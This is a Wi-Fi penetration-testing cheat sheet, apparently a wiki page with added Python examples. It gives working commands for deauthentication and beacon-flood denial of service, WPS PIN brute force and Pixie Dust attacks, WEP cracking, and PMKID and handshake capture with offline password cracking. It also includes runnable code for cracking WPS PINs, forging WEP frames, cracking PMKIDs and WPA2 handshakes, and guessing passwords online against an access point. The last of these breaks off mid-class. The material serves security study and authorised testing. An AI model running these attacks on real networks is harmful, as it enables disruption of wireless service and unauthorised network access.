Pentesting Wifi
Basic Wifi commands
```bash
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in monitor mode
iwconfig wlan0mon mode managed #Quit monitor mode - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis
```
Tools
Hijacker & NexMon (Android internal Wi-Fi)
Enable Nexmon Monitor And Injection On Android
EAPHammer
```bash
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
```
Airgeddon
```bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
```
Run airgeddon with docker
```bash
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
```
From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux
wifiphisher
It can perform Evil Twin, KARMA and Known Beacons attacks and then use a phishing template to obtain the real network password or capture social-network credentials.
```bash
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
```
Wifite2
This tool automates WPS/WEP/WPA-PSK attacks. It will automatically:
- Put the interface in monitor mode
- Scan for possible networks and let you select the victim(s)
- If WEP: launch the WEP attacks
- If WPA-PSK:
  - If WPS: the Pixie Dust attack and the brute-force attack (be careful, the brute-force attack may take a long time). Note that it does not try the null PIN or database/generated PINs.
  - Try to capture the PMKID from the AP to crack it
  - Try to deauthenticate clients of the AP to capture a handshake
  - If a PMKID or handshake was captured, try to brute-force it using the top 5000 passwords.
Attacks summary
- DoS
  - Deauthentication/disassociation: disconnect everyone (or a specific ESSID/client)
  - Random fake APs: hide networks, possibly crash scanners
  - Overload AP: try to kill the AP (usually not very useful)
  - WIDS: play with the IDS
  - TKIP, EAPOL: some specific DoS attacks against some APs
- Cracking
  - Crack WEP (several tools and methods)
  - WPA-PSK
    - WPS PIN "brute-force"
    - WPA PMKID brute-force
    - [DoS +] WPA handshake capture + cracking
  - WPA-MGT
    - Username capture
    - Brute-force credentials
- Evil Twin (with or without DoS)
  - Open Evil Twin [+ DoS]: useful to capture captive-portal creds and/or perform LAN attacks
  - WPA-PSK Evil Twin: useful for network attacks if you know the password
  - WPA-MGT: useful to capture company credentials
- KARMA, MANA, Loud MANA, Known beacon
  - + Open: useful to capture captive-portal creds and/or perform LAN attacks
  - + WPA: useful to capture WPA handshakes
Open / OWE networks - quick notes
- Passive capture on open SSIDs still works with monitor mode and tcpdump:
```bash
iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap
```
- OWE (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so frames over the air are encrypted even on "open" SSIDs. Because it ships as part of the WPA3/Enhanced Open family, it also mandates 802.11w PMF, which blocks spoofed deauth/disassoc frames.
- OWE does not authenticate joiners: anyone can associate, so verify client isolation instead of trusting marketing claims. Without isolation, ARP spoofing or Responder-style poisoning on the local L2 keeps working.
- Evil Twin is still possible on open/OWE SSIDs by offering a stronger signal; PMF only removes the deauth shortcut. If victims accept a forged TLS certificate, full HTTP(S) MitM is back on the table.
- Broadcast poisoning on open guest Wi-Fi yields creds/hashes easily (LLMNR/NBT-NS/mDNS). See:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
DOS
Deauthentication packets
Description from here.
Deauthentication attacks, a widely used technique in Wi-Fi hacking, involve forging "management" frames to forcibly disconnect devices from a network. These unencrypted packets trick clients into believing they come from the legitimate network, allowing an attacker to collect WPA handshakes for cracking or to persistently disrupt network connections. The technique, alarming in its simplicity, is widely used and has a significant impact on network security. Note that where 802.11w (PMF) is enforced, which is the case for WPA3 and OWE, such spoofed deauth/disassoc frames are discarded.
Deauthentication using aireplay-ng
```bash
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
```
- -0 means deauthentication
- the number after -0 (0 here) is how many deauths to send (you can send as many as you want); 0 means send them continuously
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if omitted a broadcast deauthentication is sent (doesn't always work)
- ath0 is the interface name
Disassociation packets
Disassociation packets, like deauthentication packets, are a type of management frame used in Wi-Fi networks. They are used to sever the connection between a device (such as a laptop or smartphone) and an access point (AP). The main difference between disassociation and deauthentication lies in their usage scenarios. While an AP sends deauthentication packets to explicitly remove rogue devices from the network, disassociation packets are typically sent when the AP is shutting down, restarting or relocating, which disconnects all connected nodes.
This attack can be performed with mdk4 (mode "d"):
```bash
# -c <channel>
# -b victim_client_mac.txt contains the MAC addresses of the devices to kick (blacklist)
# -E WifiName is the ESSID of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters are optional: you could give only the ESSID and mdk4 will search for it, wait until it finds clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
```
More DOS attacks with mdk4
From here.
ATTACK MODE b: Beacon Flooding
Sends beacon frames to show fake APs to clients. This can sometimes crash network scanners and even drivers!
```bash
# -a Use also non-printable characters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDs
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
```
ATTACK MODE a: Authentication Denial-Of-Service
Sending authentication frames to all reachable Access Points (APs) can overload them, especially when many clients are involved. This heavy traffic can cause system instability, freezing some APs or even making them reboot.
```bash
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and replay packets from authenticated clients
# -m use real MACs
# only one of -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
```
ATTACK MODE p: SSID Probing and Bruteforcing
Probing Access Points (APs) checks whether an SSID is properly revealed and confirms the AP's range. This technique, combined with brute-forcing hidden SSIDs with or without a wordlist, helps identify and access hidden networks.
ATTACK MODE m: Michael Countermeasures Exploitation
Sending random or duplicate packets to different QoS queues can trigger the Michael Countermeasures on TKIP APs, shutting the AP down for one minute. This is an effective DoS (Denial of Service) technique.
```bash
# -t <BSSID> of a TKIP AP
# -j use intelligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
```
ATTACK MODE e: EAPOL Start and Logoff Packet Injection
Flooding an AP with EAPOL Start frames creates fake sessions, exhausting the AP and blocking legitimate clients. Alternatively, injecting fake EAPOL Logoff messages forcibly disconnects clients; both methods effectively disrupt network service.
```bash
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
```
ATTACK MODE s: Attacks against IEEE 802.11s mesh networks
Various attacks against link management and routing in mesh networks.
ATTACK MODE w: WIDS Confusion
Cross-connecting clients to multiple WDS nodes or fake rogue APs can confuse Intrusion Detection and Prevention Systems, creating confusion and potential abuse of the system.
```bash
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mdk4 wlan0mon w -e <SSID> -c <channel> [-z]
```
ATTACK MODE f: Packet Fuzzer
A packet fuzzer with multiple packet sources and a nice set of modifiers for packet manipulation.
Airgeddon
Airgeddon offers most of the attacks proposed in the previous sections:
WPS
WPS (Wi-Fi Protected Setup) simplifies the process of connecting devices to a router, speeding up and easing setup for networks encrypted with WPA or WPA2 Personal. It is useless for the easily broken WEP security. WPS uses an 8-digit PIN that is validated in two halves, which makes it vulnerable to brute-force attacks because of the small number of combinations: 11,000 possibilities, 10^4 for the first half plus 10^3 for the second, since the last digit is a checksum.
WPS Bruteforce
There are 2 main tools to perform this action: Reaver and Bully.
- Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
- Bully is a new implementation of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options.
The attack exploits the WPS PIN's weakness, particularly that the AP confirms the first four digits on their own and the last digit serves as a checksum, which eases the brute-force attack. However, brute-force defenses such as blocking the MAC addresses of aggressive attackers require MAC address rotation to continue the attack.
Upon obtaining the WPS PIN with tools like Bully or Reaver, the attacker retrieves the WPA/WPA2 PSK (the AP hands it over in the WPS exchange), ensuring persistent network access.
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N [-L -d 2] -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
```
Smart Brute Force
This improved approach targets WPS PINs using known weaknesses:
- Pre-discovered PINs: use a database of known PINs linked to specific manufacturers that are known to use uniform WPS PINs. The database maps the first three octets of MAC addresses to likely PINs for those manufacturers.
- PIN generation algorithms: use algorithms like ComputePIN and EasyBox, which compute WPS PINs from the AP's MAC address. The Arcadyan algorithm additionally requires a device ID, adding a layer to the PIN generation process.
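As an added example (not part of the original page or of Reaver/Bully), the Python below shows where the 11,000-guess figure comes from and what the ComputePIN generator does: the checksum digit, the two-half PIN validation simulated against a stand-in registrar, and the ComputePIN derivation from the last 24 bits of the BSSID. The BSSID is the one used in the reaver/bully commands above; the FakeWpsRegistrar is a constructed stand-in that only mimics the M4/M6 NACK behaviour and is not a WPS implementation.

```python
# Added example: WPS PIN checksum, split brute force and ComputePIN.
# Not from the original page; the FakeWpsRegistrar below only mimics the
# M4/M6 NACK behaviour that leaks which half of the PIN is right.


def wps_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit PIN body (WPS spec, same as Reaver's wps_pin_checksum)."""
    accum, tmp = 0, pin7
    while tmp:
        accum += 3 * (tmp % 10)   # odd positions from the right weigh 3
        tmp //= 10
        accum += tmp % 10         # even positions weigh 1
        tmp //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def wps_search_space() -> int:
    # The registrar confirms the first 4 digits on their own (M4 NACK), and the
    # 8th digit is the checksum, so the second half has only 3 free digits.
    return 10 ** 4 + 10 ** 3  # 11,000 instead of 10^8


def compute_pin(bssid: str) -> str:
    """ComputePIN (Zhao Chunsheng): last 24 bits of the BSSID mod 10^7, plus checksum.
    Only vendors whose default PIN really follows this scheme are affected."""
    body = (int(bssid.replace(":", ""), 16) & 0xFFFFFF) % 10_000_000
    return f"{body:07d}{wps_checksum(body)}"


class FakeWpsRegistrar:
    """Constructed stand-in for the AP: answers whether the first half (M4)
    and then the second half (M6) of an attempt are correct."""

    def __init__(self, pin: str) -> None:
        self.pin, self.attempts = pin, 0

    def try_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self.pin[:4]

    def try_second_half(self, first: str, half: str) -> bool:
        self.attempts += 1
        return first == self.pin[:4] and half == self.pin[4:]


def split_bruteforce(ap: FakeWpsRegistrar) -> str:
    """Reaver/Bully style: at most 10,000 tries for the first half, 1,000 for the second."""
    first = next(f"{i:04d}" for i in range(10_000) if ap.try_first_half(f"{i:04d}"))
    for j in range(1_000):
        body = first + f"{j:03d}"
        candidate = body + str(wps_checksum(int(body)))
        if ap.try_second_half(first, candidate[4:]):
            return candidate
    raise RuntimeError("registrar never accepted a PIN")


if __name__ == "__main__":
    bssid = "00:C0:CA:78:B1:37"  # BSSID used in the reaver/bully commands above
    guess = compute_pin(bssid)
    print("ComputePIN candidate for", bssid, "=", guess)
    ap = FakeWpsRegistrar(guess)  # pretend the AP really uses that default
    print("brute force found", split_bruteforce(ap), "after", ap.attempts,
          "attempts out of at most", wps_search_space())
```

Try the ComputePIN candidate (and any database PINs) before the 11,000-guess sweep: a single WPS exchange per guess with the AP's lockout and MAC-blocking makes the full sweep take hours, while one correct generated PIN costs a single exchange.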
WPS Pixie Dust attack
Dominique Bongard discovered a flaw in some Access Points (APs) concerning the creation of secret codes, known as nonces (E-S1 and E-S2). If these nonces can be figured out, cracking the AP's WPS PIN becomes easy. The AP reveals the PIN inside a special code (hash) to prove it is legitimate and not a fake (rogue) AP. These nonces are essentially the "keys" to unlocking the "safe" that holds the WPS PIN. More on this can be found here.
In simple terms, the problem is that some APs did not use sufficiently random keys to encrypt the PIN during the connection process. This makes the PIN vulnerable to being guessed from outside the network (offline brute force attack).
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
```
If you don't want to put the device in monitor mode, or reaver and bully have some problem, you can try OneShot-C. This tool can perform the Pixie Dust attack without needing to switch to monitor mode.
```bash
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
```
Null Pin attack
Some poorly designed systems even allow a Null PIN (an empty or nonexistent PIN) to grant access, which is quite unusual. The tool Reaver can test for this vulnerability, unlike Bully.
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
```
Airgeddon
All the proposed WPS attacks can be easily performed using airgeddon.
- 5 and 6 let you try your custom PIN (if you have any)
- 7 and 8 perform the Pixie Dust attack
- 13 lets you test the NULL PIN
- 11 and 12 will recollect the PINs related to the selected AP from the available databases and generate possible PINs using ComputePIN, EasyBox and optionally Arcadyan (recommended, why not?)
- 9 and 10 will test every possible PIN
WEP
Why it breaks
- The RC4 seed is just IV (24 bits) + shared key. The IV is sent in cleartext, is small (2^24) and repeats quickly, so ciphertexts with the same IV reuse the keystream.
- XORing two ciphertexts encrypted with the same keystream leaks PlaintextA ⊕ PlaintextB; predictable headers plus RC4 KSA biases (FMS) let you "vote" on key bytes. PTW improves on this by using ARP traffic, reducing the requirement to a few tens of thousands of packets instead of millions.
- Integrity is only CRC32 (linear/unkeyed), so an attacker can flip bits and recompute the CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.
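The two properties above, as an added example (not part of the original page or of aircrack-ng): a toy WEP encryptor built on RC4 and CRC32 shows (1) that two frames under the same IV leak the XOR of their plaintexts, and (2) that CRC32's linearity lets an attacker rewrite a field and fix the ICV without knowing the key. The key, IV and ARP-like payloads are constructed for the example; a real PTW/FMS key recovery is not implemented here.

```python
import zlib

# Added example: toy WEP (RC4 + CRC32 ICV) showing keystream reuse and
# keyless bit-flipping. Not the page's code; key/IV/payloads are made up.


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: KSA with the seed, then PRGA XORed over the data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """frame = IV || RC4(IV||key, plaintext || CRC32(plaintext) little-endian)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """What the AP does: strip the IV, decrypt, and accept only if the ICV matches."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + key, body)
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("bad ICV")
    return data


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Same IV => same keystream, so C_A xor C_B == P_A xor P_B (no key needed)."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("different IVs, keystreams differ")
    return xor(frame_a[3:], frame_b[3:])


def wep_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Flip plaintext bits through the ciphertext and fix the ICV without the key.
    CRC32 is affine: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0...0), so the ICV
    correction depends only on D (and the length), not on P or the key."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    delta = delta.ljust(n, b"\x00")
    icv_fix = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body, delta + icv_fix)


if __name__ == "__main__":
    key, iv = b"ABCDE", b"\x01\x02\x03"  # 40-bit key; the IV space is exhausted after 2^24 frames
    pa, pb = b"ARP who-has 10.0.0.1", b"ARP who-has 10.0.0.9"
    fa, fb = wep_encrypt(key, iv, pa), wep_encrypt(key, iv, pb)
    print("leaked P_A^P_B:", keystream_reuse_leak(fa, fb)[:len(pa)])
    forged = wep_bitflip(fa, bytes(len(pa) - 1) + bytes([ord("1") ^ ord("9")]))
    print("AP accepts forged frame as:", wep_decrypt(key, forged))
```

The bit-flip is exactly what aireplay-ng's ARP replay/injection relies on: the attacker never learns the key, but every forged frame the AP accepts and re-encrypts yields a fresh IV for the PTW statistics.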
Practical cracking is straightforward:
```bash
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met
```
Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI.
WPA/WPA2 PSK
PMKID
In 2018, the hashcat team disclosed a new attack method, unique because it only needs a single packet and requires no clients to be connected to the target AP: it is just an interaction between the attacker and the AP.
Many modern routers add an optional field to the first EAPOL frame during association, the Robust Security Network (RSN) information element, which includes the PMKID.
As the original post explains, the PMKID is created using known data:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Since "PMK Name" is constant, we know the BSSID of the AP and of the station, and the PMK is identical to the one from a full 4-way handshake, hashcat can use this information to crack the PSK and recover the passphrase!
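As an added example (not the page's or hashcat's code), the Python below derives the PMK from a passphrase, computes the PMKID exactly as the formula above describes, emits the `*`-separated line hashcat `-m 16800` consumes, and runs a small dictionary attack against a PMKID. The SSID, station MAC, passphrase and wordlist are constructed for the example; the AP MAC is the one used with eaphammer in this section.

```python
import hashlib
import hmac

# Added example: PMKID derivation and offline dictionary attack.
# Not the page's code; SSID, station MAC, passphrase and wordlist are made up.


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): first 16 bytes of HMAC-SHA1."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def hashcat_16800_line(pmkid_value: bytes, mac_ap: str, mac_sta: str, ssid: str) -> str:
    """The 4 '*'-separated fields hashcat -m 16800 consumes: PMKID*MAC_AP*MAC_STA*ESSID(hex)."""
    return "*".join([pmkid_value.hex(), mac_bytes(mac_ap).hex(),
                     mac_bytes(mac_sta).hex(), ssid.encode().hex()])


def crack_pmkid(target: bytes, ssid: str, mac_ap: str, mac_sta: str, wordlist):
    """Recompute PMK -> PMKID per candidate; the PBKDF2 step is what makes this slow."""
    ap, sta = mac_bytes(mac_ap), mac_bytes(mac_sta)
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrase length limits; skip impossible guesses
            continue
        if hmac.compare_digest(pmkid(wpa_pmk(candidate, ssid), ap, sta), target):
            return candidate
    return None


# Constructed scenario: what a capture of EAPOL message 1 from the AP would contain.
SSID = "NameOfMyWifi"
MAC_AP = "70:4C:A5:F8:9A:C1"
MAC_STA = "02:00:00:aa:bb:cc"
CAPTURED_PMKID = pmkid(wpa_pmk("letmein-2024", SSID), mac_bytes(MAC_AP), mac_bytes(MAC_STA))

if __name__ == "__main__":
    print(hashcat_16800_line(CAPTURED_PMKID, MAC_AP, MAC_STA, SSID))
    print("cracked:", crack_pmkid(CAPTURED_PMKID, SSID, MAC_AP, MAC_STA,
                                  ["password", "12345678", "letmein-2024"]))
```

The per-candidate cost is the 4096-iteration PBKDF2, which is why hashcat's GPU speed, not the HMAC, decides how far down rockyou.txt you get.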
To gather this information and brute-force the password locally you can do:
```bash
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcapng -i wlan0mon --enable_status=1 # flags differ between hcxdumptool versions; check hcxdumptool -h
#You can also obtain PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
```
The captured PMKIDs will be shown in the console and also saved inside /tmp/attack.pcapng
Now, convert the capture to hashcat/john format and crack it:
```bash
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# newer hcxtools replaced hcxpcaptool; the equivalent is:
# hcxpcapngtool -o hashes.22000 /tmp/attack.pcapng && hashcat -m 22000 hashes.22000 /usr/share/wordlists/rockyou.txt
```
Please note that the correct hash format has 4 parts separated by `*` (PMKID*MAC_AP*MAC_STA*ESSID in hex), like: 4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838. If yours only has 3 parts, it's invalid (the PMKID capture wasn't valid).
Note that hcxdumptool also captures handshakes (something like this will appear: MP:M1M2 RC:63258 EAPOLTIME:17091). You can transform handshakes to hashcat/john format using cap2hccapx
```bash
tcpdump -r /tmp/attack.pcapng -w /tm/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
```
I noticed that some handshakes captured with this tool couldn't be cracked even knowing the correct password. I recommend capturing handshakes the traditional way too when possible, or capturing several of them with this tool.
Handshake capture
An attack on WPA/WPA2 networks can be carried out by capturing a handshake and attempting to crack the password offline. This process involves monitoring the communication of a specific network and BSSID on a particular channel. Here is a streamlined guide:
- Identify the BSSID, channel, and a connected client of the target network.
- Use airodump-ng to monitor the network traffic on the specified channel and BSSID, hoping to capture a handshake. The command will look like this:
```bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
```
- To increase the chance of capturing a handshake, disconnect the client from the network momentarily to force a re-authentication. This can be done with the aireplay-ng command, which sends deauthentication packets to the client:
```bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
```
Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.
Once handshake info appears in airodump-ng, it means the handshake was captured and you can stop listening.
Once the handshake is captured you can crack it with aircrack-ng:
```bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
```
Check if the handshake is in the file
aircrack
```bash
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was captured
```
tshark
```bash
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
```
cowpatty
```bash
cowpatty -r psk-01.cap -s "ESSID" -f -
```
If this tool finds an incomplete handshake of an ESSID before the completed one, it won't detect the valid one.
pyrit
```bash
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
```
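What aircrack-ng actually verifies when it "cracks" a capture, as an added example (not the page's or aircrack-ng's code): derive the PTK from the PMK with the 802.11i PRF over both MACs and both nonces, take the KCK, and recompute the HMAC-SHA1 MIC over EAPOL-Key message 2 with its MIC field zeroed. The station MAC, nonces and the EAPOL-Key frame are constructed for the example (WPA2/CCMP, key descriptor version 2); the SSID and passphrase are the ones from the hostapd config later on this page, and the BSSID is the one used in the airodump-ng command above.

```python
import hashlib
import hmac

# Added example: WPA2 4-way handshake MIC check (what aircrack-ng/hashcat do
# per candidate). Not the page's code; all handshake material is constructed.

# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 over "Pairwise key expansion", with MACs and nonces
    ordered min/max so supplicant and authenticator derive the same key."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]  # KCK = [0:16], KEK = [16:32], TK = [32:48] for CCMP


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay_counter: int = 1, key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, key info 0x010A: version 2, pairwise, MIC)."""
    body = (bytes([2]) + (0x010A).to_bytes(2, "big") + (0).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = EAPOL-Key


def crack_handshake(ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes, wordlist):
    """Return the passphrase whose KCK reproduces the MIC carried in message 2, else None."""
    snonce, mic = msg2[17:49], msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa2_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), mic):
            return candidate
    return None


# Constructed capture: the client signed message 2 with the real passphrase.
SSID, PASSPHRASE = "MITIWIFI", "mitmwifi123"
AA, SPA = bytes.fromhex("64209f154fd7"), bytes.fromhex("0200aabbccdd")  # AP BSSID, made-up station MAC
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))  # fixed nonces, real ones are random
_kck = wpa2_ptk(wpa_pmk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
_unsigned = build_msg2(SNONCE)
MSG2 = _unsigned[:MIC_OFFSET] + eapol_mic(_kck, _unsigned) + _unsigned[MIC_OFFSET + 16:]

if __name__ == "__main__":
    print("cracked:", crack_handshake(SSID, AA, SPA, ANONCE, MSG2, ["password", "mitmwifi123"]))
```

This is also why an incomplete capture is useless: message 1 is needed for the ANonce and message 2 for the SNonce plus the MIC (message 3 can substitute for message 1, since it carries the ANonce too); with only one of them there is nothing to verify a candidate against, which is what the cowpatty/aircrack checks above are telling you.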
Faster online PSK guessing via wpa_supplicant's control socket (no clients/PMKID)
When no clients are around and the AP refuses to send a PMKID, you can try PSKs online without restarting supplicants:
- Patch wpa_supplicant.c to force `dur = 0;` in the auth-failure backoff logic (next to `ssid->auth_failures`), which disables the temporary-disable timer.
- Run a single daemon with a control socket:
```bash
# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1
```
```bash
wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
```
- Drive it through the control interface, reusing the scan and the same network entry:
```
ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED
```
A small Python loop reading the socket events (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) can try roughly 100 guesses in about 5 minutes without scan overhead. It is still noisy and detectable, but it avoids per-attempt process restarts and backoff delays.
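The loop described above, as an added example (not the page's script): a minimal client for wpa_supplicant's control interface (the Unix datagram protocol wpa_cli speaks, with ATTACH to receive unsolicited events) and a guessing loop that only changes the psk and reassociates per candidate. A constructed FakeCtrl stands in for the daemon so the loop can be exercised offline; the socket path, SSID and candidate list are assumptions.

```python
import os
import socket
import tempfile

# Added example: online PSK guessing over the wpa_supplicant control socket.
# Not the page's script; FakeCtrl is a made-up stand-in for the daemon.


class WpaCtrl:
    """Minimal wpa_supplicant control-interface client (what wpa_cli speaks):
    commands go over a Unix datagram socket, replies are e.g. "OK"/"FAIL"/"0",
    and after ATTACH the daemon pushes "<level>CTRL-EVENT-..." lines."""

    def __init__(self, path: str = "/var/run/wpa_supplicant/wlp3s0", timeout: float = 30.0) -> None:
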